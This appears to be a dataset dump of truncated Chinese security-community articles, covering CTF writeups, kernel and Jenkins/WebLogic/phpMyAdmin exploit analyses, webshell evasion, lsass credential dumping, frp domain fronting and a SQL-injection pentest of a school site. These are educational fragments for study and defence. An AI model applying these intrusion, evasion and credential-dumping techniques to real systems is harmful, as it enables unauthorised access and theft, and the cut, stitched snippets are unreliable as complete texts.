text stringlengths 100 9.93M | category stringclasses 11
values |
|---|---|
# ciscn2021决赛pwn题解
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## allocate
### 程序分析
自己实现了一个分配器, 空闲的chunk组成一个单链表
* chunk结构
* 释放
* 申请
* 先尝试从free_list中获取如果失败了就直接切割mmap_mem
### 思路
* 关键在与怎么覆盖next指针, 虽然Alloc有明显的整数溢出, 但是没法利用
* 结果发现是一个关于read的骚操作: 如果read的写入区域内有不可写入的地址, 那么不会SIGV, 而是返回-1
* 这种经典读写写法中没有判断read为-1的情... | 社区文章 |
**本文翻译自:[CVE-2017-11176: A step-by-step Linux Kernel exploitation (part
1/4)](https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part1.html)**
译者注:由于有点长,所以分成了两部分,[前一部分链接](https://xz.aliyun.com/t/5185)
# Reaching the Retry Logic
在上一节中,我们分析了漏洞并设计了一个可以触发漏洞的攻击场景。在本节中,我们将看到如何触发漏洞代码(retry部分)并开始编写漏洞利用代码。
实际上,在开始前,... | 社区文章 |
**作者:宽字节安全**
**本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送!
投稿邮箱:paper@seebug.org**
## 简介
**环境:Weblogic 12.1.3**
实战中,大多数weblogic都部署在内网环境中,通过Nat协议使处于外网的用户访问。对于正常用户访问来说没有问题,对于攻击者使用T3协议回显或者攻击,则会出现很大问题,会提示如下
对于该问题,网上的解释如下
解决方案是启动weblogic时,添加一个参数`-Dweblogic.rjvm.enableprotocolswitch=true`。但是我们不可能奢求被攻击者开启这个参数,所以我们就需要通过其他方式去解决... | 社区文章 |
# 1.Brute Force
## 1.Brute Force(Low)
相关的代码分析
if( isset( $_GET[ 'Login' ] ) ) {
// Get username
$user = $_GET[ 'username' ];
// Check the database
$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
$result = mysql_query( $query ) or die( '<pre>' .... | 社区文章 |
# 羊城杯逆向Writeup
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## BabySmc
自解码,解密后代码虽然很多但从移位、密文及下面这个结构可以看出是base64编码:
细看一下他的加密过程,正常bases64的移位,但码表换了和最后多了一个异或。
所以解密的话就是先异或再提取出index,最后按照移位还原一下:
a = [0xE4, 0xC4, 0xE7, 0xC7, 0xE6, 0xC6, 0xE1, 0xC1, 0xE0, 0xC0, 0xE3, 0xC3, 0xE2, 0xC2, 0xED, 0xCD, 0xEC, 0xCC, 0xEF, 0xCF, 0xEE, 0... | 社区文章 |
# 【技术分享】利用FILE结构执行任意代码
|
##### 译文声明
本文是翻译文章,文章来源:outflux
原文地址:<https://outflux.net/blog/archives/2011/12/22/abusing-the-file-structure/>
译文仅供参考,具体内容表达以及含义原文为准。
**翻译:**[ **Ox9A82**](http://bobao.360.cn/member/contribute?uid=2676915949)
**稿费:50RMB(不服你也来投稿啊!)**
**投稿方式:发送邮件至linwei#360.cn,或登陆 ** ** ** ** **[
**网页版**](http:/... | 社区文章 |
原文:<http://phrack.org/papers/escaping_the_java_sandbox.html>
在上一篇文章中,我们为读者详细介绍了实例未初始化漏洞,在本文中,我们将为读者介绍最后两种漏洞,即受信任的方法链攻击和序列化漏洞。
**\----[ 4.3 - 受信任的方法链攻击**
* * *
**\------[ 4.3.1 - 背景知识**
* * *
在Java中,每当进行安全检测时,都会检查整个调用堆栈。其中,调用堆栈中的每一帧都含有一个方法名,并且该方法名称是由相关的类和方法的签名进行标识的。受信任的方法链攻击背后的原理是,让调用堆栈上只有受信任的类。为此,通常要求攻击者通过受信任的类中的反射特性来调... | 社区文章 |
# 记一次某 CMS 的后台 getshell
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
出于对审计的热爱,最近审了一下某 `cms`,审出了个后台 `getshell`,虽然危害不算太大,但是过程很有意思,在这里分享一下。
## 漏洞发现
### 代码审计
翻翻找找中找到了,这个函数:
function saxue_writefile( $_fileurl, $_data, $_method = "wb" ) {
$_fileopen = @fopen( $_fileurl, $_method ); // 尝试打开文件
if ( !$... | 社区文章 |
题目例子
<?php
error_reporting(0);
highlight_file(__FILE__);
$code=$_GET['code'];
if(preg_match('/[a-z0-9]/i',$code)){
die('hacker');
}
eval($code);
我们下面以命令`system('ls')`为例
**一、异或**
<?php
/*author yu22x*/
$myfile = fopen("xor_rce.txt", "w");
$contents="";
for ($i=0;... | 社区文章 |
# Windows内网协议学习LDAP篇之组和OU介绍
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
作者: daiker@360RedTeam
## 0x00 前言
这篇文章主要介绍AD里面的组和组织单位(OU)。
## 0x01 一些LDAP高级搜索语法
### 1\. LDAP 查找中的位操作
在LDAP
里面,有些字段是位字段,这里以userAccountControl举例,关于这个字段的详细意义,后面会详细介绍,这里先把他当做一个普通的位字段,不去考虑他的具体含义,这里先看下他的内容。
他的属性类位于架构分区的CN=User-Account-Control,CN=Schema,CN=C... | 社区文章 |
**前言**
2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞(CVE-2017-11882)。该漏洞为Office内存破坏漏洞,影响目前流行的所有Office版本。攻击者可以利用漏洞以当前登录的用户的身份执行任意命令。
由于漏洞影响面较广,漏洞披露后,金睛安全研究团队持续对漏洞相关攻击事件进行关注。11月19日,监控到了已有漏洞POC在网上流传,随即迅速对相关样本进行了分析。目前该样本全球仅微软杀毒可以检测。
* * *
**漏洞影响版本:**
Office 365
Microsoft Office 2000
Microsoft Off... | 社区文章 |
注意:此帖与先前的Chrome扩展漏洞略有不同。我在文中实际展示了漏洞利用的代码,并分析如何通过扩展程序进行跟踪。
在扫描各种Chrome扩展程序时,我发现流行的Chrome扩展程序视频下载程序适用于`Chrome 5.0.0.12`版(820万用户)和`Video
Downloader
Plus`(730万用户)并在浏览器操作中遇到了`XSS`漏洞页。要做到利用这些扩展插件,我们只需要让受害者导航到攻击者控制的页面即可。
导致此漏洞的原因是使用了字符串连接来构建`HTML`,该`HTML`通过`jQuery`动态附加到`DOM`中。攻击者可以创建一个专门的链接,并在扩展的上下文中执行任意`JavaScript`。利用此漏洞,攻击者... | 社区文章 |
感谢:某某
[
本书通过大量极富针对性的实验,通过对常见的安全场景中解决方案的讲解,帮助读者全面掌握各种Android攻防实用技能
[下载地址](https://pan.baidu.com/s/1nvJIN6D) | 社区文章 |
声明:仅用于技术研究,不恰当使用造成的危害后果自负
### 简言
首先,文章里没有直接 rce 的exp,想要exp的大哥抱歉了23333
但是由于执行了 groovy 代码,所以瞎j2搞的话我也不知道会出啥问题
挖jenkins好几个月了,一直莫得比较好用的洞,12.05 公布越权动态调用就搞得心里痒痒,给重新挖了下,此文章写的比较随意,大佬轻喷,欢迎交流
### 分析过程
#### 先讲讲偷窥思路
从 orange 大佬12.20公布发现了一个 jenkins 未授权 rce 开始,我就一直在试图将其挖掘出来,一直到 1.16 大佬公布第一部分
Jenkins 动态路由利用这篇文章,才真正拿到触发链,不过到最后 groovy... | 社区文章 |
# Skywalking远程代码执行漏洞分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
作者:白帽汇安全研究院[@kejaly](https://github.com/kejaly "@kejaly")
校对:白帽汇安全研究院[@r4v3zn](https://github.com/r4v3zn "@r4v3zn")
## 前言
Apache Skywalking
是分布式系统的应用程序性能监视工具,特别是为微服务,云原生和基于容器(Docker,Kubernetes,Mesos)的体系结构而设计的。
近日,Apache Skywalking 官方发布安全更新,修复了 Apache Skyw... | 社区文章 |
## 0x00 前言
HWP 是韩国 Hancom 公司开发的文字处理软件(扩展名`.hwp`),可类比于
WPS。本文分析样本利用了CVE-2017-8291,由于版权相关问题,最新版的HWP已经将GhostScript开源组件(`gbb.exe`)移除,但在旧版本上该漏洞仍然能够触发,笔者分析时使用的HWP版本如下:
在分析样本之前先来分析该漏洞,该漏洞是一个类型混淆漏洞,由POC可知其如何由类型混淆达到Bypass SAFER。
## 0x01 POC分析
如不了解GhostScript语法,请读者自行参照官方参考文档(见参考链接)学习之后再来看POC。
> 笔者分析环境:Ubuntu 18.04、Ghostscript 9.... | 社区文章 |
朋友给了我一个jboss的站,让我看看,用反序列化直接拿下webshell,就不多说了
简单的看看能不能出网。
点击burp的collaborator client 然后点击copy to clipboard。
然后在cmd输入nslookup 你复制的内容,最最后看burp有没有回显。我这里是能出网的。
简单的关掉杀软想用cs上线。这里就不贴图了。但是却发现上不了线。只好简单粗暴的连3389
端口没有改,OK,先抓密码,
procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp
sekurlsa::minidump lsass.dmp
lo... | 社区文章 |
# 【漏洞分析】MS16-124:微软内核整型溢出漏洞
|
##### 译文声明
本文是翻译文章,文章来源:安全客
原文地址:<https://blog.fortinet.com/2016/10/31/microsoft-kernel-integer-overflow-vulnerability>
译文仅供参考,具体内容表达以及含义原文为准。
****
****
**翻译:[ **scriptkid**](http://bobao.360.cn/member/contribute?uid=2529059652)**
**稿费:60RMB(不服你也来投稿啊!)**
**投稿方式:发送邮件至linwei#360.cn,或登陆[
**网页... | 社区文章 |
# 简介
阿里云安全于近日捕获到一起使用Jenkins
RCE漏洞进行攻击的挖矿事件。除挖矿外,攻击者还曾植入具有C&C功能的tsunami木马,也预留了反弹shell的功能,给用户带来极大安全隐患。
由于攻击者直接复制了Jenkins系列漏洞发现者(Orange.tw)在博客上公布的poc,攻击payload含有"Orange.tw"字样,可能被误认为是漏洞发现者在进行测试,因此我们将木马命名为ImposterMiner(冒充者)。
本次事件具有两个特点:一是ImposterMiner木马开始爆发的时间距离Jenkins漏洞利用方法公开的时间极短,仅相隔2天;二是仅靠web漏洞直接入侵,不具有蠕虫传染性。这两点与不久前利用Nexu... | 社区文章 |
# swpu ctf 有趣的邮箱注册 详细题解
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
> 不得不说,swpu的师傅们出题还是很用心的,这道题目就很不错,既有前端xss,又有后端提权,可谓是非常全面了,下面我们就简单分析一下
题目地址为: <http://118.89.56.208:6324>
## 邮箱验证
首先打开题目,发现功能只有两个,一个是验证邮箱,另一个是管理后台,但是管理后台需要本地,那突破点就在邮箱验证了。
尝试提交邮箱,发现了代码泄露,给出了过滤方式:
于是开始尝试在email处尝试xss,经过google,发现了几种绕过,尝试了一下,发现只要使用`"poc"[@qq](... | 社区文章 |
# 用Apache mod_rewrite来保护你的Empire C2
|
##### 译文声明
本文是翻译文章,文章来源:https://thevivi.net/
原文地址:<https://thevivi.net/2017/11/03/securing-your-empire-c2-with-apache-mod_rewrite/>
译文仅供参考,具体内容表达以及含义原文为准。
## 背景
由于红色团队(red teamers)发布了红色团队维基基础架构(Red Team Infrastructure
Wiki),圣诞节似乎更早的来到了。它首次出场于Jeff Dimmock和Steve
Borosh的红色团队基础架构的演讲。在设... | 社区文章 |
# 简介
Double
Fetch从漏洞原理上讲是属于条件竞争漏洞,是一种内核态与用户态之间的数据存在着访问竞争;而条件竞争漏洞我们都比较清楚,简单的来说就是多线程数据访问时,并且没有对数据做必要的安全同步措施;当多线程时,对于同一数据有一个线程在读而有另外一个线程在写,这就可能引起数据的访问异常,而此时如果这个异常访问情况发生在内核与用户线程之间时,就触发double
fetch漏洞了....
为了简化漏洞,这里我们利用[2018 0CTF Finals Baby Kernel](https://github.com/cc-sir/ctf-challenge/tree/master/2018%200CTF%20Finals%2... | 社区文章 |
# 环境
若依后台管理系统存在多种架构体系。如下
这里使用RuoYi-fast v4.7.3(前后端不分离)来分析定时任务功能点处如何绕过黑白名单,执行任意的sql语句
# Quartz组件
RuoYi-fast使用Quartz作为定时任务组件,但由于本文是重点分析定时任务处产生漏洞原因,因此仅简单写个Quartz使用demo,更多的使用可百度获取。
创建springboot项目,导入如下依赖:
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring... | 社区文章 |
# JavaScript engine exploit(二)
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 0x00 前言
这是2018年底的一个关于正则的bug,编号是191731。
关于这个Bug的描述和Diff:[About The
Bug](https://bugs.webkit.org/show_bug.cgi?id=191731)、[Diff](https://github.com/WebKit/webkit/commit/7cf9d2911af9f255e0301ea16604c9fa4af340e2?diff=split#diff-fb5fbac6e9d7542468cf... | 社区文章 |
**作者:[jweny](https://github.com/jweny)
项目地址:<https://github.com/jweny/pocassist>**
[pocassist](https://github.com/jweny/pocassist) 是一个 Go (Golang)
编写的全新的开源漏洞测试框架,实现对poc的在线编辑、管理、测试。
如果你不想撸代码,又想实现poc的逻辑,又想在线对靶机快速测试,那就使用pocassist吧。
## 0x01 特性
### 规则体系
* pocassist借鉴了xray优秀的规则体系。通过基于CEL表达式定义poc规则。
* 完全兼容xray现有规则。
* ... | 社区文章 |
# 转储lsass的方法原理和实现学习
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
`lsass.exe(Local Security Authority Subsystem
Service`进程空间中,存有着机器的域、本地用户名和密码等重要信息。如果获取本地高权限,用户便可以访问`LSASS`进程内存,从而可以导出内部数据(password),用于横向移动和权限提升。
之前用的方式还是比较局限,很容易就会被AV进行监测拦截下来,在这里总结一部分转储lsass的方法:
## 1\. 微软签名文件
* ProcDump
ProcDump是微软签名的合法二进制文件,被提供用于转储进程内存... | 社区文章 |
**作者:Yimi Hu & Light @ PwnMonkeyLab
原文链接:<https://mp.weixin.qq.com/s/OADymyp6GdW_FPetl8oPvA>**
## **简介**
通过之前几篇对智能门锁的分析和讨论,是不是有种渐入佳境的感觉?从本篇开始,我们再换一个门锁品牌进行研究,与各位读者分享更多关于智能门锁的安全研究案例。
此次要分析的产品是Loock
Touch智能门锁,由云丁科技公司出品。云丁科技是一家专注于研发和生产智能家居安全产品的公司,旗下有两大品牌,分别是针对家用市场的“鹿客”和针对公寓市场的“云丁”。Loock
Touch是鹿客品牌的主打产品之一,其架构与云丁品牌的D2、D3智能... | 社区文章 |
# JavaScriptSerializer
JavaScriptSerializer是微软内部自带的api,可以在对象和json字符串之前来回转换。其命名空间位于System.Web.Script.Serialization,结构如下:
# demo
序列化反序列化demo
using System;
using System.Web.Script.Serialization;
namespace JavaScriptDeserialize
{
class Person
{
public string Name { get; set; }
... | 社区文章 |
_____ _ ______ _ _____ _
/ ___| | | | _ \ (_) / ___| (_) {7kbscan & www.7kb.org}
\ `--. _ _| |__ | | | |___ _ __ ___ __ _ _ _ __ \ `--. _ __ _ _ __ ___ _ __
`--. \ | | | '_ \| | | / _ \| '_ ` _ \ / _` | | '_ \ `--. \ '_ ... | 社区文章 |
# Hacking 智能手环
##### 译文声明
本文是翻译文章,文章来源:https://rbaron.net/
原文地址:<https://rbaron.net/blog/2018/05/27/Hacking-a-cheap-fitness-tracker-bracelet.html>
译文仅供参考,具体内容表达以及含义原文为准。
进入现在这个公司第一天上班的那天,有一大堆东西让我痴狂不已。在这堆东西中其中就包含一个可以自己定制的健康监测手环。从技术角度上来看,能随时随地监测健康状态真是太酷了。
* 很小的尺寸(大约 15mm x 40mm)
* 低功耗蓝牙(BLE)
* OLED 显示屏(96 x 32 像素)
... | 社区文章 |
先知技术社区独家发表本文,如需要转载,请先联系先知技术社区授权;未经授权请勿转载。
先知技术社区投稿邮箱:Aliyun_xianzhi@service.alibaba.com;
初探 CSP Bypass
[+] Author: math1as[+] Team: L team
# 1 引言
无论是反射型/存储型
XSS,都因为其payload富于变化而难以被彻底根除。而目前通过对输入输出的检测,浏览器自身的filter对反射型xss有了一定的检测能力但是对于存储型XSS仍然缺乏一个有效通用解决方案。内容安全策略(csp)将在未来的XSS防御中,扮演着日渐重要的角色。但是由于浏览器的支持,XSS的环境复杂多变等问题,仍然会存在很多... | 社区文章 |
PowerShell 是运行在 Windows上实现系统和应用程序管理自动化的命令行脚本环境。你可以把它看成是命令行提示符 cmd.exe
的扩充,或是颠覆。Powershell 需要.NET环境的支持,同时支持.NET对象。其可读性,易用性,可以位居当前所有 shell 之首。 当前
PowerShell 有四版本,分别为 1.0,2.0,3.0 ,4.0**
[
[
[
> ## PowerShell 脚本
* 本地权限绕过执行 `PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1`
* 本地隐藏权限绕过执行脚本 `PowerShell.exe -Exec... | 社区文章 |
# 智能合约安全系列文章反汇编·下篇
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
上篇我们详细分析了智能合约反汇编后的代码内容,包括多个反汇编指令的含义,数据在栈中的存储方式,并通过上下文关联关系梳理代码逻辑。本篇我们将继续分析上篇遗留的反汇编代码,通过上篇学习我们已对反汇编指令在栈和内存存储的有了一定了解,该篇我们将重点来分析反汇编指令表示的代码逻辑。
## 反汇编内容
合约源代码
pragma solidity ^0.4.24;
contract Tee {
uint256 private c;
function a() publ... | 社区文章 |
# CTF中格式化字符串漏洞快速利用
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
>
> 格式化字符串是CTF比赛中很常见的一种pwn题,但是往往需要自己手工调试,如果可以快速利用该漏洞拿到一血,这无疑可以很大的鼓舞选手的信心,并且有丰厚的分值奖励。那怎么快速利用格式化字符串漏洞呢,甚至对漏洞原理不甚了解怎么快速利用呢,本文将慢慢揭晓。
首先介绍利用该漏洞的工具:<https://github.com/hellman/libformatstr>,可以直接pip install
libformatstr安装。格式化字符串漏洞的利用方式就是在任意地址写入任意数据,比如改写got表,下边分三种情况介... | 社区文章 |
# **漏洞影响范围:**
phpMyAdmin 4.8.0和4.8.1
# **漏洞分析:**
index.php 55-63行
if (! empty($_REQUEST['target'])
&& is_string($_REQUEST['target'])
&& ! preg_match('/^index/', $_REQUEST['target'])
&& ! in_array($_REQUEST['target'], $target_blacklist)
&& Core::checkPageValidity($_REQUEST['target']) ... | 社区文章 |
# 利用BHO实现IE浏览器劫持
## 0x00 前言
* * *
本文源于一个隐蔽连接的测试,模拟IE浏览器发起网络连接,能绕过某些防护产品拦截发起网络连接的第三方程序
模拟IE浏览器发起网络连接的方法有很多种,其中,利用BHO劫持IE浏览器存在诸多优点(开放接口、简单高效、功能丰富等),所以本文将要介绍BHO的开发和劫持利用思路
## 0x01 简介
* * *
本文将要介绍以下内容:
* BHO简介
* 开发BHO
* 利用思路
* 实际测试
* 防御
## 0x02 BHO简介
* * *
BHO,全称Browser Helper Object(浏览器辅助对象)
微软推出的作为浏览器对第三方程序员开放交互... | 社区文章 |
# CVE-2020-8835:Linux eBPF模块verifier组件漏洞分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## eBPF简介
> bpf系统调用执行一系列与extended Berkeley Packet Filters相关的操作,eBPF与传统的BPF相似,作用为
> 过滤网络包。对于eBPF和传统的BPF来说,为了确保它们进行的操作不会损伤运行时的系统,内核会在加载程序之前静态地分析它们。
简而言之,eBPF可以加载数据过滤代码到内核,并在进行相关操作的时候触发代码
通常见到的seccomp沙箱就是使用了eBPF模块
## eBPF程序的载入
### bpf_i... | 社区文章 |
# 【技术分享】Linux取证技术实践
|
##### 译文声明
本文是翻译文章,文章来源:countuponsecurity.com
原文地址:<https://countuponsecurity.com/2017/04/12/intro-to-linux-forensics/>
译文仅供参考,具体内容表达以及含义原文为准。
****
****
翻译:[华为未然实验室](http://bobao.360.cn/member/contribute?uid=2794169747)
预估稿费:200RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**
**
**前言**
本文将介绍Linux取证技术并予... | 社区文章 |
# 如何在Google Web Toolkit环境下Getshell
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
Google Web
Toolkit简称(GWT),是一款开源Java软件开发框架。今天这篇文章会介绍如何在这样的环境中通过注入表达式语句从而导致的高危漏洞。
## 漏洞介绍
在WEB-INF/web.xml中,我发现了以下的web端点映射:
<servlet>
<servlet-name>someService</servlet-name>
<servlet-class>com.aaa.bbb.ccc.ddd.server.SomeServiceImpl<... | 社区文章 |
# frp改版-域前置
## wss实现
github上面有人push了wss实现
<https://github.com/fatedier/frp/pull/1919/files>
**注意:**
* 由于frp不支持wss协议,所以需要cdn配置回源协议为http。
直接使用wss,frp服务端会报错:invalid protocol version。
## 具体代码修改
wss实现了就已经实现了配置域前置的第一步。
后面就是回源HOST了。由于默认frp的HOST就是连接的地址,导致无法使用域前置。
先分析WSS的HOST实在哪配置的。
D:\go\src\pkg\mod\golang.org\x\... | 社区文章 |
# webshell免杀之函数与变量玩法
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
前文列举了一些用符号免杀的例子,此篇文章就以函数和变量来尝试下免杀。
本文以PHP为例,用PHP中函数和变量及语法特性,在不隐藏函数关键字情况下进行免杀。
### 动态函数
PHP中支持一个功能叫 variable function ,变量函数的意思。
> 例:$a=’system’; $a(‘dir’); //最终是system(‘dir’);
当一个变量后边带括号,那他就被视作一个函数。编译器会解析出变量的值(假设值为符串system),然后会去找当前是否存在名为“system()”的函... | 社区文章 |
# 【技术分享】我为什么一直在买硬盘?这真的是勒索软件最后的补救办法吗?
|
##### 译文声明
本文是翻译文章,文章来源:唯品会安全应急响应中心VSRC
原文地址:[http://mp.weixin.qq.com/s?__biz=MzI5ODE0ODA5MQ==&mid=2652277525&idx=1&sn=573f3a4cd471f14c02bef5b611991cb2&chksm=f7486281c03feb975892e14367d47eb621b6adf7ec8396f736e937118fdc242892d4112fa322#rd](http://mp.weixin.qq.com/s?__biz=MzI5ODE0OD... | 社区文章 |
原文:<https://www.pentestpartners.com/security-blog/time-travel-debugging-finding-windows-gdi-flaws/>
**简介**
* * *
2018年10月,Microsoft公布了49个安全漏洞的补丁程序。在这些漏洞中,既有内核级权限提升漏洞,也有可能导致远程代码执行的漏洞,例如MSXML。在这篇文章中,我们将对一个WMF越界读取漏洞进行深入分析,并尝试确定其可利用性。
这个安全漏洞是我们提交给微软的,目前已经得到了修复,对应漏洞编号为[CVE-2018-8472](https://portal.msrc.microsoft.com/en-us/... | 社区文章 |
# 前言
之前对渗透这方面的学习一直只是学到了Getshell为止,但是其实渗透可以说Getshell仅仅是一个开端,接下去的还有远程连接,域渗透等领域,这次刚好渗透到了某网站,决定以该网站为例,看看能不能进行一次相对完整的渗透历程
# SQL注入
该网站是某校某选课网站,首先先用扫描器扫描一下网站,运气很好,居然扫出了一个注入,一看,原来是个宽字节注入
简单测了一下,发现并没有什么过滤,那就常规操作,用SQLmap跑一下
python2 sqlmap.py -u "http://xxx.xx.xx.xx/aaa/bbb.php?cid=118" --tamper=unmagicquotes
接下来便是爆库,爆表,爆列,... | 社区文章 |
# 《Chrome V8原理》22.编译链3:Bytecode的秘密——常量池
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 1 摘要
本篇是编译链专题的第三篇,详细讲解AST到字节码的转换过程。本文组织方式:字节码生成(章节2);延期常量池(章节3);编译收尾工作(章节4)。
## 2.字节码生成
把AST树翻译成字节码,入口函数源码如下:
1. MaybeHandle<SharedFunctionInfo> GenerateUnoptimizedCodeForToplevel(
2. Isolate* isolate, ParseInfo* parse_in... | 社区文章 |
### 一、前言
时隔这么多天终于有时间把当时数字经济第二道区块链题目拿来复现。感觉第二题更偏向逻辑方面的漏洞,说白了就是来考察做题人对合约的逆向能力。总结来说,以太坊的漏洞相对于其他类型问题来说还算是非常少的,所以逆合约是一个非常重要的手段,只要能完美的逆出来合约,剩下的就相对容易许多。
比赛包括两道题目,这里我们分析一下第二道题目,第一题我们见<https://xz.aliyun.com/t/6602>。
### 二、题目描述
如上图所述,拿到题目我们只能看到常规操作,即给了合约地址与发送flag的函数。为了加大难度,作者并没有给合约的源码信息,所以我们只能用最笨但是最有效的方法去逆合约。
读者可以访问这个网站来查询逆向合约信息... | 社区文章 |
# Aeroctf2019 中逆向和pwn的writeup
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## AEROCTF
[Aeroctf](http://aeroctf.com/challenges) 是 Moscow State Technical University
of Civil aviation举办的CTF,题目大多和飞机有关,涉及了飞机、安全和航空固件等内容,同时具备战斗民族的属性——不走寻常路。
## 逆向
### key checker
[题目](http://aeroctf.com/files/6921ce3540c49e34969dab8f22bde55f/ke... | 社区文章 |
# Referer
<https://y4er.com/post/ysoserial-commonscollections-5/>
<https://www.jianshu.com/p/d4954c691d09>
<https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections5.java>
<https://www.freebuf.com/news/150872.html>
# 环境搭建
idea创建一个maven项目,在pom.xml文件中加入commons-collections依赖。
... | 社区文章 |
# 连载《Chrome V8 原理讲解》第五篇 V8语法分析器源码讲解
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 1.摘要
本次是第五篇,剖析V8语法分析(parser)的源码和工作流程,讲解V8语法分析的核心源码、主要工作流程以及重要数据结构。本文将沿用第四篇文章的“测试样例代码”。
## 2.语法分析概述
语法分析是词法分析(scanner)的下一阶段,词法分析输出(out)的token字是语法分析的输入(in),语法分析在工作时会频繁使用词法分析器生成token。本文把词法分析器当作黑盒功能使用,直接给出词法分析的token字结果,词法分析器原理参见第四篇文章。
## 3.源码分... | 社区文章 |
# 1\. 内存分析
**6.1虚拟机的密码是 ** ** **_****** 。(密码中为flag{xxxx},含有空格,提交时不要去掉)
6.2虚拟机中有一个某品牌手机的备份文件,文件里的图片里的字符串为 ** ** **_******
。(解题过程中需要用到上一题答案中flag{}内的内容进行处理。本题的格式也是flag{xxx},含有空格,提交时不要去掉)**
tips也是不要去空格
用volatility_2.6_win64_standalone.exe分析Target.vmem,先看系统版本
**volatility_2.6_win64_standalone.exe -f Target.vmem imagei... | 社区文章 |
# ThinkPHP 5.0.X代码审计:
## 前言:
本次记录主要是对ThinkPHP 框架的 5.0.x版本进行代码审计,主要涉及的软件有:
> PHPSTORM
>
> Seay源代码审计系统
>
> Phpstudy_pro
>
> PHP版本使用7.3.4
关于PHPSTORM的Xdebug的搭建,我主要参考了[暗月的教程](https://www.bilibili.com/video/BV1Ri4y1m7AZ/?spm_id_from=333.788&vd_source=12a4f922a214b16d9f4d1f3565210b8b)
(说实话phpstudy_pro的配置文件真的太麻烦了)
[ThinkPHP 5.... | 社区文章 |
### **0x01 理解系统调用**
shellcode是一组可注入的指令,可以在被攻击的程序中运行。由于shellcode要直接操作寄存器和函数,所以必须是十六进制的形式。
那么为什么要写shellcode呢?因为我们要让目标程序以不同于设计者预期的方式运行,而操作的程序的方法之一就是强制它产生系统调用(system,call,syscall)。通过系统调用,你可以直接访问系统内核。
在Linux里有两个方法来执行系统调用,间接的方法是c函数包装(libc),直接的方法是用汇编指令(通过把适当的参数加载到寄存器,然后调用int
0x80软中断)
废话不多说,我们先来看看最常见的系统调用exit(),就是终止当前进程。
#... | 社区文章 |
# 【知识】5月5日 - 每日安全知识热点
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
**热点概要:** **为恶意软件事件响应构建本地的passiveDNS 、如何保护漏洞利用:检测PageHeap、在渗透测试中Netcat使用的技巧
、如何寻找漏洞绕过CFG、Pwn2Own 2017: UAF in JSC::CachedCall (WebKit)**
**资讯类:**
* * *
****
****
****
****
[](https://www.hackread.com/darkoverlord-hacks-westpark-capital-bank/)
GO... | 社区文章 |
**作者:ze0r @360A-TEAM
公众号:[360安全监测与响应中心](https://mp.weixin.qq.com/s/ogKCo-Jp8vc7otXyu6fTig
"360安全监测与响应中心")
相关阅读:[[下篇]从补丁diff到EXP--CVE-2018-8453漏洞分析与利用](https://paper.seebug.org/798/
"\[下篇\]从补丁diff到EXP--CVE-2018-8453漏洞分析与利用")**
在本篇文章中,我们将对CVE-2018-8453(Windows win32kfull.sys内核提权漏洞)进行深入分析。
因国内外各大安全公司和平台主观和客观上的各种原因,该漏洞... | 社区文章 |
作者:LoRexxar'@知道创宇404实验室
#### 0x01 背景
织梦内容管理系统(DedeCms)以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。
2018年1月10日, 锦行信息安全公众号公开了一个关于DeDeCMS前台任意用户密码修改漏洞的细节[2]。
2018年1月10日,Seebug漏洞平台[3]收录该漏洞,漏洞编号为SSV-97074,知道创宇404... | 社区文章 |
# 漏洞成因
* pipe维护了一个`struct pipe_buffer`的数组,每个pipe_buffer指向一个page,page里存的就是pipe的数据
* 正常情况下,往pipe里写数据时会申请一个page,把数据拷贝到page里后再让pipe_buffer指向这个page。splice系统调用实现了一种零拷贝的技术,直接让pipe_buffer指向这个原始的数据page,这样就省去了内存拷贝的过程,提升效率
* 往pipe里写数据时不可能每次都正好是page_size的整数倍,如果每次写数据都要重新分配一个新的page来存,必然会造成空间的浪费。但是如果pipe_buffer的`PIPE_BUF_FLAG_C... | 社区文章 |
# Jungo Windriver中的代码执行漏洞(CVE-2018-5189)分析(上)
|
##### 译文声明
本文是翻译文章,文章原作者 Fidus InfoSecurity,文章来源:fidusinfosec.com
原文地址:<https://www.fidusinfosec.com/jungo-windriver-code-execution-cve-2018-5189/>
译文仅供参考,具体内容表达以及含义原文为准。
## 介绍
Windows内核漏洞利用这个领域的水其实非常深,想要学习这方面知识也是非常困难的,虽然网上有很多有用的教程,但由于漏洞利用场景的不同,相关的漏洞利用技术也不一样。在这篇文章中,我将跟大家介... | 社区文章 |
# 数据安全建设实践系列——安全资产平台建设篇
